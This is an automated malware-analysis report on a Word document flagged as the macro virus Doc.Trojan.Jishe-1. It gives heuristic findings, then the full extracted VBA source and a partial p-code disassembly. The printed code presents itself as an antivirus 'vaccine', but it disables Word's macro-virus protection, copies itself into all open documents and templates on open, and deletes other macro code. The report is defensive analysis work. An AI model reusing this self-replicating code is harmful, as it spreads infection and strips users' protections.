MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Document_Open, which are commonly used to execute malicious code upon document opening. The presence of these macros and the ClamAV detection as 'Doc.Trojan.Jishe-1' strongly indicate a malicious intent to infect the user's system. No specific IOCs like URLs or file paths were extracted from the provided evidence.
Heuristics 6
-
ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jishe-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
If LinesofCode > 0 Then xItem.codemodule.DeleteLines 1, LinesofCode -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46588 bytes |
SHA-256: ca2866c87e34d1f4a7611bf6a19c29c2b9713a39547eb6821f0db0c819c2a6d9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Option Explicit '程序中的变量必须先定义后使用
Const answer0 = "FreeWordMacroVirusKiller" '保持与以前版本的兼容性
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" '本程序标志
'Version 2.0
Private Sub Document_Open()
CloseVirusProtection
'检查打开的文档中是否有病毒
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
Attribute VB_Name = "JiShenhua"
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Option Explicit '程序中的变量必须先定义后使用
Public pVirusReport As String '病毒描述信息
Private Const cMyID As String = "MyMacroVirusKiller" '本程序代码标志
Private Const cMyVersion As String = "V2.2" '本程序版本标准
Private Const cMyModule As String = "JiShenhua" '本程序的模块名称
Private Const cMyUserForm As String = "VirusReport" '本程序的用户窗口名称
Private Const cLinesofThisDocument As Integer = 25 '在ThisDocument模块中全部代码的行数
Private Const cOK As Integer = 0 '一切正常
Private Const cDocHasModuleElse As Integer = 1 '有其他模块存在
Private Const cDocHasCodeElse As Integer = 2 '在ThisDocument模块中有其他代码存在
Private Const cDocHasAllElse As Integer = 3 '在ThisDocument模块中有其他代码存在,并有其他模块存在
Private Const cDocProtected As Integer = 4 '该文档被保护
Public Const cDocHasOldVersion As Integer = 8 '该文档中有旧版本该杀病毒模块
'打开文档时自动执行
Sub AutoOpen()
CloseVirusProtection
'检查打开的文档中是否有病毒,如果有病毒,向用户提出报告
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
'新建文档时自动执行
Sub AutoNew()
CloseVirusProtection
Infect Word.ActiveDocument
End Sub
'关闭WORD之前清理autoexec.dot文件中的病毒
Sub AutoExit()
Const AutoDotFile = "C:\AUTOEXEC.DOT"
If Dir(AutoDotFile) <> "" Then
Kill AutoDotFile
End If
End Sub
'从指定文件中向所有打开文档及模板中复制本程序代码及模块
Public Function InfectAll() As Boolean
Dim myDoc As Document, myTemp As Template
'向打开的文档中写入本代码
For Each myDoc In Documents
Infect myDoc
Next myDoc
'向WORD模板中写入本代码
For Each myTemp In Templates
Infect myTemp
Next myTemp
InfectAll = True
End Function
'清除所有打开文档及模板中的病毒模块及代码
Public Function ClearVirus() As Boolean
Dim i As Integer
Dim myDoc As Document, myTemp As Template
Dim Cleared As Boolean
ClearVirus = True
'检查所有文档并清除
For Each myDoc In Documents
Cleared = ClearDocument(myDoc)
If Not Cleared Then
MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myDoc.Name
ClearVirus = False
End If
Next myDoc
'检查所有模板并清除
For Each myTemp In Templates
Cleared = ClearDocument(myTemp)
If Not Cleared Then
MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myTemp.Name
ClearVirus = False
End If
Next myTemp
End Function
'检查所有打开的文档及模板中是否有病毒存在,如果有,返回病毒信息描述字符串
Public Function ScanVirus() As Boolean
Dim DocsCount As Integer, i As Integer, ret As Integer
Dim myStr As String
Dim myDoc As Document, myTemp As Template
ScanVirus = 0
pVirusReport = ""
'检查所有打开的文档中是否有病毒
For Each myDoc In Documents
ret = ScanDocument(myDoc)
Select Case ret
Case cOK, cDocProtected, cDocHasOldVersion
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
End Select
Next myDoc
'检查所有模板
For Each myTemp In Templates
ret = ScanDocument(myTemp)
Select Case ret
Case cOK, cDocProtected, cDocHasOldVersion
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
End Select
Next myTemp
End Function
'把本程序代码从一个文件复制到另一个文件中
Private Function Infect(TargetFile) As Boolean
Dim xItem, CommandStr As String, file As String
Dim myDoc As Document, myTemp As Template
Dim LinesofCode As Long, myStr As String
'检查参数类型是否正确
myStr = TypeName(TargetFile)
If myStr <> "Document" And myStr <> "Template" Then
MsgBox "使用数据类型" + myStr + "调用函数Infect,系统只允许使用Document及Template类型。", vbOKOnly, "系统错误"
Infect = False
Exit Function
End If
Infect = True
If TargetFile.Name = ThisDocument.Name Then Exit Function '目标文件与源文件相同时不执行写入操作
If Infected(TargetFile) Then Exit Function '目标文件已经存在本程序代码
If TargetFile.VBProject.Protection Then Exit Function '目标文件被保护,不能执行写入操作
Infect = False
'清除目标文档中已经存在的其他模块及代码
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.codemodule.CountOfLines
If LinesofCode > 0 Then xItem.codemodule.DeleteLines 1, LinesofCode
Else
TargetFile.VBProject.VBComponents.Remove xItem
End If
Next xItem
'向文档中写入本程序代码及模块
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyModule, TargetFile.FullName + ":" + cMyModule
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyUserForm, TargetFile.FullName + ":" + cMyUserForm
' ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^
'该程序段如果放在前两个语句之前,就会导致VBA32.DLL程序出现致命错误而死机,
'穷我之毕生编程经验,不知何故,天哪!天理何在?
LinesofCode = ThisDocument.VBProject.VBComponents(1).codemodule.CountOfLines
myStr = ThisDocument.VBProject.VBComponents(1).codemodule.lines(1, LinesofCode)
TargetFile.VBProject.VBComponents(1).codemodule.InsertLines 1, myStr
Infect = True
End Function
'检查指定文档中是否已经有本程序代码
Private Function Infected(TargetFile)
Dim xItem, LinesofCode As Integer
Dim BeInfected As Integer
Dim myType As String, NewVersion As String
myType = TypeName(TargetFile)
If myType <> "Document" And myType <> "Template" Then
MsgBox "使用数据类型" + myType + "调用函数Infected,系统只允许使用Document及Template类型。", vbOKOnly, "系统错误"
Infected = True
Exit Function
End If
'检查目标文档是否被保护
If TargetFile.VBProject.Protection Then
Infected = True
Exit Function
End If
'当ThisDocument,myModule,myUserForm均存在时,表示该文件已经被感染
BeInfected = 0
NewVersion = cMyID & cMyVersion
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.codemodule.CountOfLines
If (LinesofCode > 0) And (xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1)) Then
BeInfected = BeInfected Or 1
End If
ElseIf xItem.Name = cMyModule Then
BeInfected = BeInfected Or 2
ElseIf xItem.Name = cMyUserForm Then
BeInfected = BeInfected Or 4
End If
Next xItem
If BeInfected = 7 Then
Infected = True
Else
Infected = False
End If
End Function
'检查指定的打开文档及模板中是否有病毒存在
Private Function ScanDocument(myDocOrTemp) As Integer
Dim xItem, i As Integer, myStr As String
Dim LinesofCode As Integer, NewVersion As String
ScanDocument = cOK
NewVersion = cMyID & cMyVersion
'检查参数类型是否正确
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "调用函数ScanDocument只能使用Document及Template数据类型。", vbOKOnly, "系统错误"
Exit Function
End If
myStr = myDocOrTemp.Name + "检查结果:" + vbCrLf
'检查程序模块是否被保护
If myDocOrTemp.VBProject.Protection Then
ScanDocument = cDocProtected
myStr = myStr + " 文件中的程序代码被保护,系统无法自动查杀,但也可能存在病毒,请小心!" + vbCrLf
Exit Function
End If
For Each xItem In myDocOrTemp.VBProject.VBComponents
If (xItem.Name = "ThisDocument") Then
'此部分有代码时,如果总行数超出了规定的行数或者找不到本模块标志则认定为病毒
LinesofCode = xItem.codemodule.CountOfLines
If LinesofCode > 0 Then
If (LinesofCode > cLinesofThisDocument) Then
ScanDocument = ScanDocument Or cDocHasCodeElse
myStr = myStr + " <" + xItem.Name + ">对象中有其他程序存在,大概是病毒。" + vbCrLf
ElseIf Not xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1) Then '查找是否有新版本存在
If xItem.codemodule.Find(cMyID, 1, 1, 1 + LinesofCode, 1) Then '查找是否有旧版本存在
ScanDocument = cDocHasOldVersion
Else
ScanDocument = ScanDocument Or cDocHasCodeElse
myStr = myStr + " <" + xItem.Name + ">对象中有其他程序存在,大概是病毒。" + vbCrLf
End If
End If
End If
ElseIf (xItem.Name <> cMyModule) And (xItem.Name <> cMyUserForm) Then
'文档中除本模块代码之外,如果还有其它代码则认定为病毒
ScanDocument = ScanDocument Or cDocHasModuleElse
myStr = myStr + " 有其他模块<" + xItem.Name + ">存在,极有可能是病毒。" + vbCrLf
End If
Next
If ScanDocument = cOK Then myStr = myStr + "没有病毒,请放心使用。" + vbCrLf
pVirusReport = pVirusReport + myStr
End Function
'清除指定的打开文档及模板中的病毒模块及代码
Private Function ClearDocument(myDocOrTemp) As Boolean
Dim xItem, LinesofCode As Integer
Dim NewVersion As String
ClearDocument = False
'检查参数类型是否正确
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "调用函数ClearDocument只能使用Document及Template数据类型。", vbOKOnly, "系统错误"
Exit Function
End If
If myDocOrTemp.VBProject.Protection Then
ClearDocument = True
Exit Function
End If
'检查文档是否有病毒
NewVersion = cMyID & cDocHasOldVersion
If ScanDocument(myDocOrTemp) Then
For Each xItem In myDocOrTemp.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.codemodule.CountOfLines
If (LinesofCode > 0) And (Not xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1)) Then
xItem.codemodule.DeleteLines 1, LinesofCode
End If
ElseIf xItem.Name <> cMyModule And xItem.Name <> cMyUserForm Then
myDocOrTemp.VBProject.VBComponents.Remove xItem
End If
Next
End If
ClearDocument = True
End Function
'关闭Word宏病毒保护功能
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
Options.VirusProtection = Protected
End Function
Attribute VB_Name = "VirusReport"
Attribute VB_Base = "0{1DA31361-649C-11D5-9CE6-0060083AC635}{1DA3135B-649C-11D5-9CE6-0060083AC635}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'窗体程序代码
Option Explicit '程序中的变量必须先定义后使用
'打开窗体时执行的操作
Private Sub UserForm_Initialize()
CheckBox1.Value = True
Information.Value = pVirusReport
Beep
End Sub
'关闭窗体,不作任何处理
Private Sub CommandButtonNothing_Click()
Dim ret As Integer
ret = MsgBox("领导,虽然你可能会批评我,但还是要告诉你,这样做是很危险的。" & vbCrLf & "是否真的不做处理,请批示。", vbYesNo + vbDefaultButton2, "再次报告!")
If ret = vbYes Then
Unload Me
End If
End Sub
'打开VisulBasic编辑器
Private Sub CommandButtonOpenVisubasic_Click()
ShowVisualBasicEditor = True
End Sub
'杀病毒
Private Sub CommandButtonKill_Click()
If ClearVirus Then
ResetMenu
InfectAll
Unload Me
MsgBox "按照您的指示,我已经把可能是病毒的东东全部清理完毕," & vbCrLf & "不过也可能好心办了坏事,那可不要怪我哟。", vbOKOnly, "报告!"
Else
MsgBox "不知什么原因,清除病毒工作不成功,请您手工检查或与我联系。", vbOKOnly, "冀慎华向您报告:"
Unload Me
End If
End Sub
'恢复被病毒更改的菜单项
Private Function ResetMenu()
Dim mItem, cItem, myKey As KeyBinding
CustomizationContext = NormalTemplate
'Alt+F8:打开宏对话框
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
'Alt+F11:打开VisualBasic编辑器
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
FindKey(BuildKeyCode(wdKeyAlt, wdKeyH)).Clear
FindKey(BuildKeyCode(wdKeyAlt, wdKeyK)).Clear
'恢复工具菜单的原始设置
For Each mItem In CommandBars("Tools").Controls
mItem.Reset
Next mItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.Reset
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoProtection
End If
Next cItem
End Function
' Processing file: /tmp/qstore_adfbel5b
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3005 bytes
' Line #0:
' QuoteRem 0x0000 0x0043 "这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染"
' Line #1:
' QuoteRem 0x0000 0x0045 "这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒"
' Line #2:
' QuoteRem 0x0000 0x003C "感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力"
' Line #3:
' QuoteRem 0x0000 0x0031 "与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力"
' Line #4:
' QuoteRem 0x0000 0x0037 "欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士"
' Line #5:
' QuoteRem 0x0000 0x0010 "程序设计: 冀慎华"
' Line #6:
' QuoteRem 0x0000 0x0009 "办公电话:"
' Line #7:
' QuoteRem 0x0000 0x0016 "伊妹地址: club@263.net"
' Line #8:
' Option (Explicit)
' QuoteRem 0x0010 0x001C "程序中的变量必须先定义后使用"
' Line #9:
' Dim (Const)
' LitStr 0x0018 "FreeWordMacroVirusKiller"
' VarDefn answer0
' QuoteRem 0x002B 0x0016 "保持与以前版本的兼容性"
' Line #10:
' Dim (Const)
' LitStr 0x0016 "MyMacroVirusKillerV1.0"
' VarDefn answer1
' Line #11:
' Dim (Const)
' LitStr 0x0016 "MyMacroVirusKillerV2.0"
' VarDefn answer2
' Line #12:
' Dim (Const)
' LitStr 0x0016 "MyMacroVirusKillerV2.2"
' VarDefn answer3
' QuoteRem 0x0029 0x000A "本程序标志"
' Line #13:
' QuoteRem 0x0000 0x000B "Version 2.0"
' Line #14:
' FuncDefn (Private Sub Document_Open())
' Line #15:
' ArgsCall CloseVirusProtection 0x0000
' Line #16:
' QuoteRem 0x0004 0x001A "检查打开的文档中是否有病毒"
' Line #17:
' Ld ScanVirus
' IfBlock
' Line #18:
' Ld VirusReport
' ArgsCall Local 0x0001
' Line #19:
' Ld VirusReport
' ArgsMemCall Show 0x0000
' Line #20:
' ElseBlock
' Line #21:
' ArgsCall InfectAll 0x0000
' Line #22:
' EndIfBlock
' Line #23:
' EndSub
' Macros/VBA/JiShenhua - 17745 bytes
' Line #0:
' QuoteRem 0x0000 0x0043 "这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染"
' Line #1:
' QuoteRem 0x0000 0x0045 "这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒"
' Line #2:
' QuoteRem 0x0000 0x003C "感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力"
' Line #3:
' QuoteRem 0x0000 0x0031 "与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力"
' Line #4:
' QuoteRem 0x0000 0x0037 "欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士"
' Line #5:
' QuoteRem 0x0000 0x0010 "程序设计: 冀慎华"
' Line #6:
' QuoteRem 0x0000 0x0009 "办公电话:"
' Line #7:
' QuoteRem 0x0000 0x0016 "伊妹地址: club@263.net"
' Line #8:
' Option (Explicit)
' QuoteRem 0x0010 0x001C "程序中的变量必须先定义后使用"
' Line #9:
' Dim (Public)
' VarDefn pVirusReport (As String)
' QuoteRem 0x001E 0x000C "病毒描述信息"
' Line #10:
' Dim (Private Const)
' LitStr 0x0012 "MyMacroVirusKiller"
' VarDefn cMyID (As String)
' QuoteRem 0x0035 0x000E "本程序代码标志"
' Line #11:
' Dim (Private Const)
' LitStr 0x0004 "V2.2"
' VarDefn cMyVersion (As String)
' QuoteRem 0x002C 0x000E "本程序版本标准"
' Line #12:
' Dim (Private Const)
' LitStr 0x0009 "JiShenhua"
' VarDefn cMyModule (As String)
' QuoteRem 0x0030 0x0010 "本程序的模块名称"
' Line #13:
' Dim (Private Const)
' LitStr 0x000B "VirusReport"
' VarDefn cMyUserForm (As String)
' QuoteRem 0x0034 0x0014 "本程序的用户窗口名称"
' Line #14:
' Dim (Private Const)
' LitDI2 0x0019
' VarDefn cLinesofThisDocument (As Integer)
' QuoteRem 0x0033 0x0022 "在ThisDocument模块中全部代码的行数"
' Line #15:
' Dim (Private Const)
' LitDI2 0x0000
' VarDefn cOK (As Integer)
' QuoteRem 0x0021 0x0008 "一切正常"
' Line #16:
' Dim (Private Const)
' LitDI2 0x0001
' VarDefn cDocHasModuleElse (As Integer)
' QuoteRem 0x002F 0x000E "有其他模块存在"
' Line #17:
' Dim (Private Const)
' LitDI2 0x0002
' VarDefn cDocHasCodeElse (As Integer)
' QuoteRem 0x002D 0x0022 "在ThisDocument模块中有其他代码存在"
' Line #18:
' Dim (Private Const)
' LitDI2 0x0003
' VarDefn cDocHasAllElse (As Integer)
' QuoteRem 0x002C 0x0034 "在ThisDocument模块中有其他代码存在,并有其他模块存在"
' Line #19:
' Dim (Private Const)
' LitDI2 0x0004
' VarDefn cDocProtected (As Integer)
' QuoteRem 0x002B 0x000C "该文档被保护"
' Line #20:
' Dim (Public Const)
' LitDI2 0x0008
' VarDefn cDocHasOldVersion (As Integer)
' QuoteRem 0x002F 0x001C "该文档中有旧版本该杀病毒模块"
' Line #21:
' QuoteRem 0x0000 0x0012 "打开文档时自动执行"
' Line #22:
' FuncDefn (Sub AutoOpen())
' Line #23:
' ArgsCall CloseVirusProtection 0x0000
' Line #24:
' QuoteRem 0x0004 0x0035 "检查打开的文档中是否有病毒,如果有病毒,向用户提出报告"
' Line #25:
' Ld ScanVirus
' IfBlock
' Line #26:
' Ld VirusReport
' ArgsCall Local 0x0001
' Line #27:
' Ld VirusReport
' ArgsMemCall Show 0x0000
' Line #28:
' ElseBlock
' Line #29:
' ArgsCall InfectAll 0x0000
' Line #30:
' EndIfBlock
' Line #31:
' EndSub
' Line #32:
' QuoteRem 0x0000 0x0012 "新建文档时自动执行"
' Line #33:
' FuncDefn (Sub AutoNew())
' Line #34:
' ArgsCall CloseVirusProtection 0x0000
' Line #35:
' Ld Word
' MemLd ActiveDocument
' ArgsCall Infect 0x0001
' Line #36:
' EndSub
' Line #37:
' QuoteRem 0x0000 0x0028 "关闭WORD之前清理autoexec.dot文件中的病毒"
' Line #38:
' FuncDefn (Sub AutoExit())
' Line #39:
' Dim (Const)
' LitStr 0x000F "C:\AUTOEXEC.DOT"
' VarDefn AutoDotFile
' Line #40:
' Ld AutoDotFile
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #41:
' Ld AutoDotFile
' ArgsCall Kill 0x0001
' Line #42:
' EndIfBlock
' Line #43:
' EndSub
' Line #44:
' QuoteRem 0x0000 0x0036 "从指定文件中向所有打开文档及模板中复制本程序代码及模块"
' Line #45:
' FuncDefn (Public Function InfectAll() As Boolean)
' Line #46:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #47:
' QuoteRem 0x0004 0x0018 "向打开的文档中写入本代码"
' Line #48:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #49:
' Ld myDoc
' ArgsCall Infect 0x0001
' Line #50:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #51:
' QuoteRem 0x0004 0x0016 "向WORD模板中写入本代码"
' Line #52:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #53:
' Ld myTemp
' ArgsCall Infect 0x0001
' Line #54:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #55:
' LitVarSpecial (True)
' St InfectAll
' Line #56:
' EndFunc
' Line #57:
' QuoteRem 0x0000 0x0028 "清除所有打开文档及模板中的病毒模块及代码"
' Line #58:
' FuncDefn (Public Function ClearVirus() As Boolean)
' Line #59:
' Dim
' VarDefn i (As Integer)
' Line #60:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #61:
' Dim
' VarDefn Cleared (As Boolean)
' Line #62:
' Line #63:
' LitVarSpecial (True)
' St ClearVirus
' Line #64:
' QuoteRem 0x0004 0x0012 "检查所有文档并清除"
' Line #65:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #66:
' Ld myDoc
' ArgsLd ClearDocument 0x0001
' St Cleared
' Line #67:
' Ld Cleared
' Not
' IfBlock
' Line #68:
' LitStr 0x0020 "病毒清除工作不成功,请检查原因。"
' Ld vbOKOnly
' Ld myDoc
' MemLd New
' ArgsCall MsgBox 0x0003
' Line #69:
' LitVarSpecial (False)
' St ClearVirus
' Line #70:
' EndIfBlock
' Line #71:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #72:
' QuoteRem 0x0004 0x0012 "检查所有模板并清除"
' Line #73:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #74:
' Ld myTemp
' ArgsLd ClearDocument 0x0001
' St Cleared
' Line #75:
' Ld Cleared
' Not
' IfBlock
' Line #76:
' LitStr 0x0020 "病毒清除工作不成功,请检查原因。"
' Ld vbOKOnly
' Ld myTemp
' MemLd New
' ArgsCall MsgBox 0x0003
' Line #77:
' LitVarSpecial (False)
' St ClearVirus
' Line #78:
' EndIfBlock
' Line #79:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #80:
' EndFunc
' Line #81:
' QuoteRem 0x0000 0x0048 "检查所有打开的文档及模板中是否有病毒存在,如果有,返回病毒信息描述字符串"
' Line #82:
' FuncDefn (Public Function ScanVirus() As Boolean)
' Line #83:
' Dim
' VarDefn DocsCount (As Integer)
' VarDefn i (As Integer)
' VarDefn ret (As Integer)
' Line #84:
' Dim
' VarDefn myStr (As String)
' Line #85:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #86:
' Line #87:
' LitDI2 0x0000
' St ScanVirus
' Line #88:
' LitStr 0x0000 ""
' St pVirusReport
' Line #89:
' QuoteRem 0x0004 0x001E "检查所有打开的文档中是否有病毒"
' Line #90:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #91:
' Ld myDoc
' ArgsLd ScanDocument 0x0001
' St ret
' Line #92:
' Ld ret
' SelectCase
' Line #93:
' Ld cOK
' Case
' Ld cDocProtected
' Case
' Ld cDocHasOldVersion
' Case
' CaseDone
' Line #94:
' Ld cDocHasModuleElse
' Case
' Ld cDocHasCodeElse
' Case
' Ld cDocHasAllElse
' Case
' CaseDone
' Line #95:
' LitVarSpecial (True)
' St ScanVirus
' Line #96:
' CaseElse
' Line #97:
' LitStr 0x002C "函数ScanDocument返回错误代码,系统无法识别。"
' Ld vbOKOnly
' LitStr 0x0008 "系统出错"
' ArgsCall MsgBox 0x0003
' Line #98:
' EndSelect
' Line #99:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #100:
' QuoteRem 0x0004 0x000C "检查所有模板"
' Line #101:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #102:
' Ld myTemp
' ArgsLd ScanDocument 0x0001
' St ret
' Line #103:
' Ld ret
' SelectCase
' Line #104:
' Ld cOK
' Case
' Ld cDocProtected
' Case
' Ld cDocHasOldVersion
' Case
' CaseDone
' Line #105:
' Ld cDocHasModuleElse
' Case
' Ld cDocHasCodeElse
' Case
' Ld cDocHasAllElse
' Case
' CaseDone
' Line #106:
' LitVarSpecial (True)
' St ScanVirus
' Line #107:
' CaseElse
' Line #108:
' LitStr 0x002C "函数ScanDocument返回错误代码,系统无法识别。"
' Ld vbOKOnly
' LitStr 0x0008 "系统出错"
' ArgsCall MsgBox 0x0003
' Line #109:
' EndSelect
' Line #110:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #111:
' EndFunc
' Line #112:
' QuoteRem 0x0000 0x0028 "把本程序代码从一个文件复制到另一个文件中"
' Line #113:
' FuncDefn (Private Function Infect(TargetFile) As Boolean)
' Line #114:
' Dim
' VarDefn xItem
' VarDefn CommandStr (As String)
' VarDefn file (As String)
' Line #115:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #116:
' Dim
' VarDefn LinesofCode (As Long)
' VarDefn myStr (As String)
' Line #117:
' Line #118:
' QuoteRem 0x0004 0x0014 "检查参数类型是否正确"
' Line #119:
' Ld TargetFile
' ArgsLd TypeName 0x0001
' St myStr
' Line #120:
' Ld myStr
' LitStr 0x0008 "Document"
' Ne
' Ld myStr
' LitStr 0x0008 "Template"
' Ne
' And
' IfBlock
' Line #121:
' LitStr 0x000C "使用数据类型"
' Ld myStr
' Add
' LitStr 0x0036 "调用函数Infect,系统只允许使用Document及Template类型。"
' Add
' Ld vbOKOnly
' LitStr 0x0008 "系统错误"
' ArgsCall MsgBox 0x0003
' Line #122:
' LitVarSpecial (False)
' St Infect
' Line #123:
' ExitFunc
' Line #124:
' EndIfBlock
' Line #125:
' LitVarSpecial (True)
' St Infect
' Line #126:
' Ld TargetFile
' MemLd New
' Ld ThisDocument
' MemLd New
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x003E 0x0024 "目标文件与源文件相同时不执行写入操作"
' Line #127:
' Ld TargetFile
' ArgsLd Infected 0x0001
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x002F 0x001A "目标文件已经存在本程序代码"
' Line #128:
' Ld TargetFile
' MemLd VBProject
' MemLd Protection
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x003A 0x0020 "目标文件被保护,不能执行写入操作"
' Line #129:
' LitVarSpecial (False)
' St Infect
' Line #130:
' Line #131:
' QuoteRem 0x0004 0x0026 "清除目标文档中已经存在的其他模块及代码"
' Line #132:
' StartForVariable
' Ld xItem
' EndForVariable
' Ld TargetFile
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #133:
' Ld xItem
' MemLd New
' LitStr 0x000C "ThisDocument"
' Eq
' IfBlock
' Line #134:
' Ld xItem
' MemLd codemodule
' MemLd CountOfLines
' St LinesofCode
' Line #135:
' Ld LinesofCode
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld LinesofCode
' Ld xItem
' MemLd codemodule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #136:
' ElseBlock
' Line #137:
' Ld xItem
' Ld TargetFile
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Remove 0x0001
' Line #138:
' EndIfBlock
' Line #139:
' StartForVariable
' Ld xItem
' EndForVariable
' NextVar
' Line #140:
' Line #141:
